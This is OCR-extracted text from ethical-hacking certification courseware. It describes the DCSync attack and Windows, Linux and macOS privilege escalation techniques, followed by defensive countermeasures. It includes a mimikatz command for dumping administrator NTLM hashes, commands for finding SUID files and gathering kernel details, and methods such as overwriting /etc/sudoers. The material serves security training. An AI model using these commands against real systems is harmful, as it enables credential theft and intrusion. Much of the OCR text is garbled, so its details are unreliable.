Retrieving Password Hashes of Other Domain Controllers Using DCSync Attack A domain controller (DC) in a Windows environment is configured to securely validate user requests within a domain. The function of a DC is to stockpile user accounts and data, provide authentication, and append a security policy for the domain. Replicating a directory in the IT environment plays a vital role as it assists system administrators to organize and handle data flow across many DCs. For example, when an employee of an organization updates their account credentials, the updated credentials should be replicated across all the DCs, which can facilitate easy authentication for users. The DCSync attack is a technique used by attackers on selective DCs. In this attack, an attacker initially compromises and obtains privileged account access with domain replication rights. Then, they activate replication protocols to create a virtual DC similar to the original AD. This access enables the attacker to send requests to the DC and receive the victim’s confidential information such as NTLM password hashes. Using this information, an attacker can launch further attacks such as golden ticket attacks, account manipulation, and living off the land (LOTL) attacks as well as embed ransomware in the compromised servers. DCSync Attack Stages The DCSync attack is performed in the following eight stages, which start from lower privileges and proceed to higher privileges.

=

Stage 1: Performs external reconnaissance

=

Stage 2: Compromises the targeted machine

=

Stage 3: Performs internal reconnaissance

=

Stage 4: Escalates local privileges

Module 06 Page 746

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking =

Stage 5: Compromises credentials by sending commands to DC

=

Stage 6: Performs admin-level reconnaissance

=

Stage 7: Performs malicious remote code execution

=

Stage 8: Gains domain admin credentials rt Reconnaissance

Attacker External

Reconnaissance

* we

Internal

Compromised

ig Reconnaissance

Machine

|

ne scalation

Figure 6.122: Stages of the DCSync attack

Access Rights Required for Performing DCSync Attack Initially, when attackers obtain privileged account access through other means of attack, they have limited access rights to the domain resources. These access rights are insufficient for attackers to perform a DCSync attack. Hence, they require more time to gain additional permissions to perform a DCSyn attack. After obtaining additional permissions or higher privileges, attackers can perform the following activities: =

Replicating Directory Changes

=

Replicating Directory Changes All

=

Replicating Directory Changes in Filtered Set

How Attackers Compromise the Domain Controller (DC) =

An attacker initially identifies the DC to compromise and requests for replication.

=

The attacker either deploys tools such as mimikatz to replicate the DC and request multiple DCs to replicate the information or sends a GetNCChanges command as a request for replication of information on the DC.

=

Now, the DC accepts the request, acknowledges the replication request, and hands over password hashes to the attacker. Attacker

disco

Requests rep!

Domain Controller (Server)

Figure 6.123: Illustration of the DCSync attack

Module 06 Page 747

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Tools for Performing a DCSync Attack =

Mimikatz

Source: https://github.com Mimikatz is a command-line tool that allows attackers to obtain credentials from registry memory locations. Attackers leverage mimikatz to perform DCSync attacks. Mimikatz includes a DCSync command that utilizes the Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to replicate the behavior of a legitimate DC. Attackers execute the following command to retrieve the NTLM administrator account: mimikatz

“lsadump::dcsync

/domain:

(domain

password hashes of an

name)

/user:Administrator”

Figure 6.124: Screenshot of Mimikatz

Module 06 Page 748

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Other Privilege Escalation Techniques Access Token Manipulation

CE H

Windows uses access tokens to determine the security context of a process or thread

|

Attackers can obtain access tokens of other users or generatespoofed tokens to escalate privileges and perform

malicious activities while evading detection

|G The appropriate PPID can be set to the process that is derived from theSYSTEM through system processes such as

Parent PID

|

Application

Shimming

|@ The Windows Application Compatibility Framework called Shim is used toprovide compatibility between older and newer | _ versions of Windows | Shims such as RedirectEXE, injectDLL, and GetProcAddress can be used by attackers to escalate privileges, install backdoors,

Filesystem

| @ ifthe filesystem permissions of binaries are not properly set, an attacker canreplace the target binary with a malicious file

Spoofing

Permission

Weakness

Path Interception

svchost.exeor consent.exe using the Windows UAC security feature

|@ Attackers abuse these methods to bypass security mechanisms thatrestrict process spawning from the parent and maintain persistence to elevate their privileges

| @ ifthe process that is executing this binary has higher-level permissions, then the malicious binary is also executed with

higher-level permissions

|

| Applications include many weaknesses and misconfigurations such as unquoted paths, path environment variable misconfiguration, and search order hijacking, which lead to path interception @ Path interception helps an attackermaintain persistence on a system and escalate privileges

Other Privilege Escalation Techniques (Cont'd) ngity busi sibil Acces Fostares

SID-History Injection CoM

Hijacking Scheduled tr. cee i ‘asks in Windows Scheduled

Tasks in

Linux

Module 06 Page 749

CE H

|@ Attackers create persistence and escalate privileges by embedding andrunning malicious code within Windows accessibility features

|@ Attackers gain escalated privileges by replacing one of the accessibility features withcmd.exeor by replacing

binaries in the registry to gain backdoor access |@ The Windows Security Identifier (SID) is a unique value assigned to each user and group account issued by the | domain controllerat the time of creation | Attackers abuse this feature to inject the SID value of an administratoror equivalent account that has higher privileges into the compromised user account's SID-history |@_ The COM hijacking process involves tampering with object references or replacing them with malicious content in the |

|

= |

Windows registry

|@_ When a user executes that commonly used object, the malicious code is automatically executed, allowing attackers to maintain persistence and escalate the privileges given to the object |G Windows Task Scheduler, along with utilities such as “at” and “schtasks,” can be used to schedule programs that can be executed at a specific date and time

@

The attacker can use this technique toexecute malicious programs at system startup, maintain persistence, perform

@

Linux utilizes “cron” or a “crond,” an instruction-based utility,for automating task scheduling

remote execution, escalate privileges, etc.

| Attackers escalate system privileges by making changes to the scripts executed by cron located at/ete/crontab

| Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Other Privilege Escalation Techniques (Cont’d)

CE H

|@ Launchd is used in macOS boot up to complete the system initialization process by loading parameters for each launch-on-demand system-level daemon |@ Daemons have plists that are linked to executables that run at start up |@ The attacker can alter the launch daemon’s executable to maintain persistence or to escalate privileges

Terence Daemon

@ Plist files in macOS describe when programs should execute, the executable file path, the program

Plist

Modification

Setuid and Setgid

Web Shell

parameters, the required OS permissions, etc.

|@ Attackers alter plist files to execute malicious code on behalfof a legitimate user to escalate privileges @ In Linux and macoS, if an application uses setuid or setgid then the application will execute with the privileges of the owning user or group |@ Anattacker can exploit the applications with the setuid or setgid flags to execute malicious code with elevated privileges |@ AWeb shell is a web-based script that allows access to a web server

|@ Attackers create web shells to inject malicious script on a web server to maintain persistent access and

escalate privileges

Abusing Sudo Rights

@ Sudois a UNIX and Linux based system utility that permits usersto run commandsas a superuser or root using the security privileges of another user @ Attackers can overwrite the sudo configuration file, /ete/sudoers with their own maliciousfile to escalate privileges Abusing SUID and SGID Permissions

@ SUID andSGID are access permissions given to a program file in Unix based systems @

Attackers can use executable commands

with SUID and SGID bits enabled to escalate privileges

Kernel Exploits

@ Kernel exploitsare referred to as the programs the can exploit vulnerabilities presentin the kernel to. execute arbitrary commands or code with higher privileges @ Attackers can attain superuser access or root-level accessto the target system by exploiting kernel vulnerabilities

Other Privilege Escalation Techniques =

Access Token Manipulation In Windows OSs, access tokens are used to determine the security context of a process or thread. These tokens include the access profile (identity and privileges) of a user associated with a process. After a user is authenticated, the system produces an access

Module 06 Page 750

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

token. Every process the user executes makes use of this access token. The verifies this access token when a process is accessing a secured object.

system

Any Windows user can modify these access tokens so that the process appears to belong to some other user than the one who started it. Then, the process acquires the security context of the new token. For example, Windows administrators have to log on as normal users and need to run their tools with admin privileges using token manipulation command “runas.” Attackers can exploit this to access the tokens of other users, or generate spoofed tokens, to escalate privileges and perform malicious activities while evading detection. =

Parent PID Spoofing Attackers attempt to bypass the internal process or service that tracks security measures and to escalate privileges by spoofing the parent process ID (PPID) of a recently added process. These new processes are derived directly from their parent if they are not specified precisely. An explicit specification can be made by providing a PPID for the new process via the CreateProcess API. Usually, this API call process consists of specific arguments to determine the particular PPID to be used. The appropriate PPID can be set to the process that is derived from the system through

system processes such as svchost.exe Or consent. exe using Windows User Account

Control (UAC). Attackers abuse these methods to bypass security mechanisms that restrict process spawning from a parent, tools that analyze parent-child relationships, and maintain persistence to elevate their privileges. =

Application Shimming The Windows OSs use a Windows Application Compatibility Framework called shims to provide compatibility between the older and newer versions of Windows. For example, application shimming allows programs created for Windows XP to be compatible with Windows 11. Shims provide a buffer between the program and the OS. This buffer is referenced when a program is executed to verify whether the program requires access to the shim database. When a program needs to communicate with the OS, the shim database uses API hooking to redirect the code. All the shims installed by the default Windows installer (sbinst.exe) are stored at %WINDIR%\AppPatch\sysmain. sdb hk1lm\software\microsoft\windows

nt\currentversion\appcompatflags\installedsdb

Shims run in user mode, and they cannot modify the kernel. Some of these shims can be used to bypass UAC (RedirectEXE), inject malicious DLLs (InjectDLL), capture memory addresses (GetProcAddress), etc. An attacker can use these shims to perform different attacks including disabling Windows Defender, privilege escalation, installing backdoors, etc.

Module 06 Page 751

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

Filesystem Permission Weakness Many processes in the Windows OSs execute binaries automatically as part of their functionality or to perform certain actions. If the filesystem permissions of these binaries are not set properly, then the target binary file may be replaced with a malicious file, and the actual process can execute it. If the process that is executing this binary has higher-level permissions, then the binary also executes under higher-level permissions, which may include SYSTEM. Attackers can exploit this technique to replace original binaries with malicious binaries to escalate privileges. Attackers use this technique to manipulate Windows service binaries and self-extracting installers.

=

Path Interception Path interception is a method of placing an executable in a particular path in such a way that the application will execute it in place of the legitimate target. Attackers can exploit several flaws or misconfigurations to perform path interception like unquoted paths (service paths and shortcut paths), path environment variable misconfiguration, and search order hijacking. Path interception helps an attacker to maintain persistence on a system and escalate privileges.

=

Abusing Accessibility Features Attackers create persistence and escalate privileges by embedding and running malicious code within Windows accessibility features. Accessibility features are activated using key combinations even before a user logs into a system. An attacker can manipulate these features to obtain backdoor access without logging into the system. In a Windows environment, these programs are stored at the location Cc: \Windows\System32\ and can be launched by pressing specific keys during a system reboot. Attackers gain escalated privileges by replacing one of the accessibility features with cmd.exe or by replacing binaries in the registry to gain backdoor access when a key combination is pressed at the login screen. This technique allows attackers to obtain system-level access. The following are other accessibility features abused by attackers:

=

o

On-screen keyboard: C: \Windows\System32\osk.exe

o

Magnifier: c: \Windows\System32\Magnify.exe

o

Narrator:

o

Display switcher: C: \Windows\System32\DisplaySwitch.exe

o

App switcher: c: \Windows\System32\AtBroker.exe

o

Sticky keys:

Cc: \Windows\System32\Narrator.exe

C: \Windows\System32\sethc.exe

SID-History Injection

In Windows, Windows Security Identifier (SID) is a unique value assigned to each user and group accounts issued by the domain controller (DC) at the time of creation. These

Module 06 Page 752

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

AD accounts can store multiple SID values in the SID-history attribute, which are used when migrating the user from one domain to another. Attackers abuse this feature to inject the SID value of an administrator or equivalent account containing higher privileges into the compromised user account’s SID-history attribute. This injection could elevate the user account privileges, using which the

attacker can access restricted resources or remote systems. Attackers can also access other domain resources by performing further movement techniques such as remote services, SMB/Windows admin shares, or Windows remote management. =

COM Hijacking The Component Object Model (COM) is an interface module in Windows environments that enables a software component to interact with another software component’s code without being aware of their actual implementation. Attackers exploit COM objects by hijacking their valid references and adding their own references to infect the target system and achieve persistence. This process involves tampering or replacing object references with malicious content in Windows Registry. When a user executes that commonly used object, the malicious code is automatically executed, allowing attackers maintain persistence and escalate the privileges given to the object.

Attackers might use the following techniques while performing COM hijacking: o

By taking advantage of the registry loading process and creating a malicious user object under the HKEY_CURRENT_USER\Software\Classes\CLSID\ registry, which is loaded by the system before loading the

HKEY

=

LOCAL MACHINE\SOFTWARE\Classes\CLSID\ registry

o

By interchanging existing DLLs or executable names with malicious payloads that will be executed when legitimate DLLs or executables are executed

o

By taking advantage of orphan requests made by the system components that are not yet defined in the registry, creating malicious COM objects for those requests in the HKEY_CURRENT_USER registry and mapping them to the malicious payloads hidden in the file system

Scheduled Tasks in Windows Scheduled tasks allow users to perform routine tasks chosen for a computer automatically. Windows includes utilities such as at and schtasks. A user with administrator privileges can use these utilities in conjunction with Task Scheduler to schedule programs or scripts that can be executed at a particular date and time. If a user provides proper authentication, they can also schedule a task from a remote system using a Remote Procedure Call (RPC). An attacker can use this technique to execute malicious programs at system startup, maintain persistence, perform remote execution, escalate privileges, etc.

=

Scheduled Tasks in Linux Linux utilizes cron or a crond, an instruction-based utility, for automating task scheduling. Attackers abuse this utility for triggering a malicious payload when a specific

Module 06 Page 753

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

task is scheduled to be executed. This scheduler assists users with administrator privileges in configuring cron and executing a monotonous cron job at a specific time. cron executes all the commands from the crontab file located at its root, /etc/crontab. Attackers escalate system privileges by making changes to the scripts executed by cron located at /etc/crontab. By modifying these scripts, attackers can force malicious scripts to be executed automatically during system reboot for gaining root privileges. Command

Description

crontab

|

Installs or modifies the crontab file

crontab

-1

Displays currently running crontabs

crontab

-r

Deletes the crontab file

crontab -r crontab

-e

crontab

-u

Deletes the crontab of the specified user Schedules software updates/modifies the crontab .

file of the current user

-e

Modifies the crontab of the specified user Table 6.12: List of cron commands

=

Launch Daemon During the macOS booting process, launchd is executed to complete the system initialization process. Parameters for each launch-on-demand system-level daemon found in /System/Library/LaunchDaemons and /Library/LaunchDaemons are loaded using launchd. These daemons have property list files (plist) that are linked to executables that run at the time of booting. Attackers can create and install a new launch daemon, which can be configured to execute at boot-up time using launchd or launchctl to load plist into the relevant directories. The weak configurations allow an attacker to alter the existing launch daemon’s executable to maintain persistence or to escalate privileges.

=

Plist Modification In macOS, plist (property list) files include all the necessary information that is needed to configure applications and services. These files describe when programs should execute, the executable file path, program parameters, essential OS permissions, etc. The plist files are stored at specific locations like /Library/Preferences (which execute with high-level privileges) and ~/Library/Preferences (which execute with user privileges). Attackers can access and alter these plist files to execute malicious code on behalf of a legitimate user, and further use them as a persistence mechanism and to escalate privileges.

=

Setuid and Setgid In Linux and macOS, if an application uses setuid or setgid, the application will execute with the privileges of the owning user or group, respectively. Generally, the applications run under the current user’s privileges. There are certain circumstances where the

Module 06 Page 754

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

programs must be executed with elevated privileges but the user running the program does not need the elevated privileges. In this scenario, one can set the setuid or setgid flags for their applications. An attacker can exploit the applications with the setuid or setgid flags to execute malicious code with elevated privileges. =

Web Shell A web shell is a web-based script that allows access to a web server. Web shells can be created in all OSs like Windows, Linux, and macOS. Attackers create web shells to inject a malicious script on a web server to maintain persistent access and escalate privileges. Attackers use a web shell as a backdoor to gain access and control a remote server. Generally, a web shell runs under the current user’s privileges. Using a web shell, an attacker can perform privilege escalation by exploiting local system vulnerabilities. After escalating privileges, an attacker can install malicious software, change user permissions, add or remove users, steal credentials, read emails, etc.

=

Abusing Sudo Rights Sudo (substitute user do) is a UNIX- and Linux-based system utility that permits users to run commands as a superuser or root by using the security privileges of another user. An

/etc/sudoers

file

includes

the

configuration

of sudo

rights.

detailed information regarding access permissions, including allowed to run with or without passwords per user or group.

This

file

commands

contains

that

are

Attackers can abuse sudo to escalate their privileges to run programs that the normal users are not allowed to run. For example, if an attacker has sudo-rights to run a cp command

then

he/she

can

overwrite

an

/etc/sudoers

or /etc/shadow

file with

his/her own malicious file. By overwriting the content of the sudoers file, he/she can edit the permissions to run various restricted commands or programs to launch further attacks on the system.

=

Abusing SUID and SGID Permissions Set User Identification (SUID) and Set Group Identification (SGID) are access permissions given to a program file in UNIX-based systems. These permissions usually allow the users on the system to run a program with temporarily elevated privileges or root privileges to execute a particular task. The files with SUID and SGID rights run with higher privileges. In Linux, there are some commands and binaries that can be executed by the attackers to elevate their privileges from non-root users to root users, if flags of SUID and SGID rights are set. Some of the executable commands that can be used by attackers to spawn a shell and escalate privileges are nmap, vim, less, more, bash, cat, cp, echo, find, nano, etc. Attackers can use the following commands to find SUID and SGID files in the target system: # Find SUID find

/

-perm

-u=s

-type

f

2>/dev/null

# Find GUID

Module 06 Page 755

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking find

=

/

-perm

Exam 312-50 Certified Ethical Hacker

-g=s

-type

f

2>/dev/null

Kernel Exploits Kernel exploits refer to programs that can exploit vulnerabilities present in the kernel to execute arbitrary commands or code with higher privileges. By successfully exploiting kernel vulnerabilities, attackers can attain superuser or root-level access to the target system. To run a kernel exploit, attackers must have configuration details of the target system. Attackers use the following commands to obtain details such as the OS, kernel version, and architecture of the target system: #OS cat

/etc/issue

# Kernel version uname

-a

# Architecture cat

/proc/version

Attackers search https://www.exploit-db.com and execute Python linprivchecker.py to detect kernel exploits for escalating privileges.

Module 06 Page 756

scripts

such

as

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Privilege Escalation Tools BeRoot

|

CE H

BeRoot is a post-exploitation tool to check common misconfigurations

linpostexp

to find a way to escalate privileges

|

linpostexp tool obtains detailed information onthe kernel, which can be used to escalate

privileges on the target system

"tes Peithab. com Other Privilege

Escalation Tools:

PowerSploit

—_tts://github.com

FullPowers

tts: fita.com

PEASS-ng.

https: ithbscom

Copyright © by

Windows Exploit Suggester

tps://oktub.com

Al Rights Reserved. Reproduction i

Privilege Escalation Tools Privilege escalation tools such as BeRoot, attackers to run a configuration assessment underlying vulnerabilities, services, file and etc. Using this information, attackers can privileges on the target system. =

linpostexp, Windows Exploit Suggester, etc. allow on a target system to find information about the directory permissions, kernel version, architecture, further find a way to exploit and elevate their

BeRoot

Source: https://github.com BeRoot is a post-exploitation tool to check common escalate privilege.

misconfigurations to find a way to

As shown in the screenshot, using this tool, attackers can obtain information about service permissions, writeable directories with their locations, permissions on startup keys, etc.

Module 06 Page 757

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

(c)

Microsoft

Exam 312-50 Certified Ethical Hacker

inal Corporation.

PHHHHAEEHEHHHAAHE

[!]

True

Permission

Service

to

create

Hi All

rights

reserved

Privilege

Escalation

BANG

!

BANG

#HHHAHHHHHHHHABHE

a service

with

openscmanager

] Binary located on a writable directory

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AarSvc

Full path: C:\Windows

Writable

Nai

directory:

AarSvc

(

stem32\svchost.exe

\Windows\system32

-k AarSvcGroup

-p

permissions: {'change_config': False, ‘start False, 'stop': False} Key: HKEY LOCAL _MACHINE\SYSTEM\CurrentControlSet\Services\AarSvc_24f Full path: C:\Windows\system32\ host.exe -k AarSvcGroup -p Writable directory: ( Windows \ Name: AarSvc_24f3e7

Figure 6.125: Screenshot of BeRoot showing service permissions

Module 06 Page 758

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

msfconsole - Parrot

PHHHHHABHHAHAHA

Startup

[!]

with

Registry

key

Keys

##HHHHAHAAHAAHAHE

writable

access

IHKEY_LOCAL_MACHINE\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

IHKEY_LOCAL_MACHINE\SOFTWARE\

\Microsoft\\Windows\\CurrentVersion’

located on a writable directory

[!] Binary

Name:

\Wow6432Node\

SecurityHealth

Key:

SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

Full

path:

Ir

dir

%windir

Windows\system32

ystem32\SecurityHealthSystray.exe

Name: SunJavaUpdateSched Key: SOFTWARE\\Wow6432Node\ \Microsoft\\Windows\\CurrentVersion\\Run \ritable directory: C:\Program Files (x86)\Common Files\Java\Java Update Full path: "C:\Program Files (x86)\Common Files\Java\Java Update\jus

PHHHHHBHHHEAEHHEE ft]

True

mission

(HHH

Taskscheduler to write

~Check

on the

user

d#HHHHHHHHHEHHHE task

directory

indows\system32\ tasks

admin #4HHHHHHAHAAAHHHE

[!] Is user in the administrator group Figure 6.126: Screenshot of BeRoot showing Startup keys and Taskscheduler permissions =

linpostexp

Source: https://github.com The linpostexp tool obtains detailed information on the kernel, which can be used to escalate privileges on the target system. As shown in the screenshot, using this tool, attackers can obtain information about the kernel, filesystems, superuser, sudoers, sudo version, etc. Attackers can use this information to exploit vulnerabilities present in the kernel to elevate their privileges. The following command is used to extract this information about the target system: #python

Module 06 Page 759

linprivchecker.py

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

@arrot @python Linprivche; LINUX PRIVILEGE ESC t*] GETTING BASIC SYSTEM I

+] Kernel Linux version 5.14.6-9parrotl-and64 (team 2.35.2 Pp. GNU ld (GNU Binutils for

org) (gcc-10 (Debian 10.2.1-6) 10.2.1 2021 an 5.14.9-9parrotl (2021-10-26)

} Hostname parrot

I+] Operating system Parrot 0S 5.0 \n \l *) GETTING NETWORKING INFO [+] Interfaces ethd: flags=4163 mtu 1500 255.255.255.8 broadcast 10.10.1 d: dB txqueuele 14.9 MiB) overruns @ frame @ 8 packets 451 31351 (1.6 MiB) errors @ drop 1 © carrier @ flags=73_ mtu 65536

Figure 6.127: Screenshot of linpostexp displaying kernel details GETTING FILESYSTEM INFO...

Mount results sysfs on /sys type sysfs (rw,nosuid,nodev,noexec, relatime) proc on /proc type proc uid, nodev, noexec, relatime) udev on /dev type devtmpfs (rw,nosuid, relatime, size=4018268k,nr_inodes=1004567 ,mode=75! mode=620, ptmxmode=000) devpts on /dev/pts type devpts (rw,nosuid,noexec, relatine, tmpfs on /run type tmpfs (rw,nosuid,nodev,noexec, relatime 313092k mode=755, inode64) /dev/sdal on / type btrfs (rw,noatime,nodiratime, nodatasum,nodatacow, space cache, autodef, rag, subvo| 257, subvol=/@ securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec, relatime) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev, inode64) tmpfs on /run/lock type tmpfs (rw, nosuid, nodev,noexec, relatime, size=5120k, inode64) cgroup2 on /sys/fs/cgroup type cgroup2 (rw,nosuid, nodev, noexec, relatime,nsdelegate,memory recursi on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec, relatime) none on /sys/fs/bpf type bpf (rw,nosuid,nodev,noexec, relatime,mode=760) systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw, relatime, fd=29, pgrp=1, timeout=0,minprot 5, direct ,pipe_ino=19260) mqueue on /dev/mqueue type mqueue (rw,nosuid, nodev,noex time) huget Lb dev/hugepages type hugetLbfs (rw, relatime, pagesize=2M) fs on /sys/kernel/debug type debugfs (rw,nosuid,nodev, noexec, relatime) /tracing type tracefs (rw,nosuid, nodev, noexec, relatir fuse/connections type fusectl (rw,nosuid,nodev, noexec, relatime) type configfs (rw,nosuid, nodev,noexec, relatime)

binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec, relatime) tmofs on /run/user/1908_ tvoe tmofs (rw nosuid nodev.relatime. size=813088k_nr_inodes=203272. mode

Figure 6.128: Screenshot of linpostexp showing filesystem info Some additional privilege escalation tools are listed as follows: =

PowerSploit (https://github.com)

=

FullPowers (https://github.com)

=

PEASS-ng (https://github.com)

=

Windows Exploit Suggester (https://github.com)

Module 06 Page 760

‘al Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

How to Defend against Privilege Escalation 1 |

Restrict interactive logon privileges

) | 6 |

Run users and applicationswith the lowest

}

Reduce the amountof code thatruns with a particular privilege

Implement multi-factor authentication and

) |

Perform debugging using bounds checkers and

privileges

authorization

|

|

|

to limit the scope of programming errors and bugs

|

9 |

| |

Use an encryption technique to protect sensitive data

stress tests

Run services as unprivileged accounts Implementa privilege separation methodology

|

CE H

|

Thoroughly test the system for application coding errors and bugs Regularly patch and update the kernel

How to Defend against Privilege Escalation (Cont’d) Use ful y ful y

qualified paths ini all Windows q u a l i f i e d paths indows applications

j11 | Change the UAC settingsto “Always Notify”

F

EE]

EEA

ite ers rom writing es tote sear

CEH

ye

paths for applications

PE]

Continuously monitor file-system permissions

only legitimate administrators can make service

changes

Use whitelisting tools to identify and block

malicious software

protected directories

In macOS, make plist files read-only

using auciting tools

Reduce the privilegesof users and groups so that

eure thst at enecutabes ae paced in rte

;

| 19 |

Block unwanted system utilitiesor software that

may be used to schedule tasks

Regularly the web servers pi ‘gularly ps patch and update

Al Rights Reserved. Reproduction i

How to Defend against Privilege Escalation The best countermeasure against privilege escalation is to ensure that users have the lowest possible privileges that are adequate to use their system effectively. Thus, even if an attacker succeeds in gaining access to a low-privilege account, they will not be able to gain administrative-level access. Often, flaws in programming code allow such escalation of privileges on a target system. As stated earlier, an attacker can gain access to the network using a nonadministrative account and then gain the higher privileges of an administrator. Module 06 Page 761

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

The following are the best countermeasures to defend against privilege escalation: Restrict interactive logon privileges.

Run users and applications with the lowest privileges. Implement multi-factor authentication and authorization. Run services as unprivileged accounts. Implement a privilege separation methodology to limit the scope of programming errors and bugs. Use an encryption technique to protect sensitive data.

Reduce the amount of code that runs with a particular privilege. Perform debugging using bounds checkers and stress tests. Thoroughly test the system for application coding errors and bugs. Regularly patch and update the kernel. Change UAC settings to “Always Notify” to increase the visibility of the user when elevation is requested.

UAC

Restrict users from writing files to the search paths for applications. Continuously monitor file-system permissions using auditing tools. Reduce the privileges of user accounts and groups so that only legitimate administrators can make service changes. Use whitelisting tools to identify directory, or service permissions.

and

block

malicious

software

that

changes

file,

Use fully qualified paths in all Windows applications. Ensure that all executables are placed in write-protected directories. In macOS, prevent plist files from being altered by users by making them read-only. Block unwanted system utilities or software that may be used to schedule tasks. Regularly patch and update the web servers. Disable the default local administrator account. Detect, repair, and fix any flaws or errors running in the system services. Keep the files read-only and require it.

provide write access to only the users and groups that

Incorporate the provisioning and de-provisioning of accounts to prevent the hijacking of orphaned accounts. Enable Data Execution Prevention code request.

Module 06 Page 762

(DEP) in Windows

systems to block any executable

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Defend against the Abuse of sudo Rights Implement a strong password policy for sudo users. Turn off password caching by setting timestamp_timeout to 0 so that users must input their password every time sudo is executed. Separate sudo-level administrative accounts from the administrator’s regular accounts to prevent theft of sensitive passwords. Update user permissions and accounts at regular intervals. Test sudo execution.

users

with

access to programs

containing

parameters

for arbitrary

code

Defend against DCSync Attacks The following are the best countermeasures to defend against DCSync attacks: Examine the permissions assigned to the users and administrators. Keep track of the accounts that request domain replication rights. Conduct security awareness training on the system management, threat detection, and response systems.

configuration,

system

patch

Deploy network surveillance tools such as Sean Metcalf and StealthDEFEND to accumulate DC IP addresses and decide which IP addresses need to be included in the replication list. Defend against PPID Spoofing Verify PPID fields where information is stored to detect irregularities. Identify the legitimate parent process using the event header PID specified by ETW. Periodically analyze Windows API calls such as CreateProcess for malicious PIDs. Monitor system API calls exclusively assigning PPIDs to new processes.

Module 06 Page 763

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Tools for Defending against DLL and Dylib Hijacking

CE H

Dependency Walker Dylib Hijack Scanner |@ Dependency Walker detects many common application | @ Dylib Hijack Scanner is a simple utility that will scan your computer problems such as missing modules, invalid modules, for applications that are either susceptible to dylib hijacking or import/export mismatches, and circular dependency have been hijacked errors

http://w. dependencywolker.com

Trtes objective see com

Tools for Defending against DLL and Dylib Hijacking Cybersecurity professionals can use tools such as Dependency Walker, DLL Hijack Audit Kit, and DLLSpy to detect and prevent privilege escalation using DLL hijacking. In addition, tools such as Dylib Hijack Scanner help security professionals to detect and prevent privilege escalation using Dylib hijacking on macOS systems. These tools help security professionals to monitor system files for modifying, moving, renaming, or replacing DLLs or dylibs in the systems.

Module 06 Page 764

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking =

Dependency Walker

Source: http://www.dependencywalker.com Dependency Walker is useful for troubleshooting system errors related to loading and executing modules. It detects many common application problems, such as missing modules, invalid modules, import/export mismatches, circular dependency errors, etc. As shown in verify all the missing DLLs, misconfigured

the screenshot, cybersecurity professionals use Dependency Walker to DLLs used by an application, the location from which DLLs are loaded, etc. This information helps security professionals to detect, patch, and fix DLLs in the systems.

4 Dependency Walker - snoopy.exe] a File Edit View Options Profile Window Help SH

RiaAe\as

saa

SEM

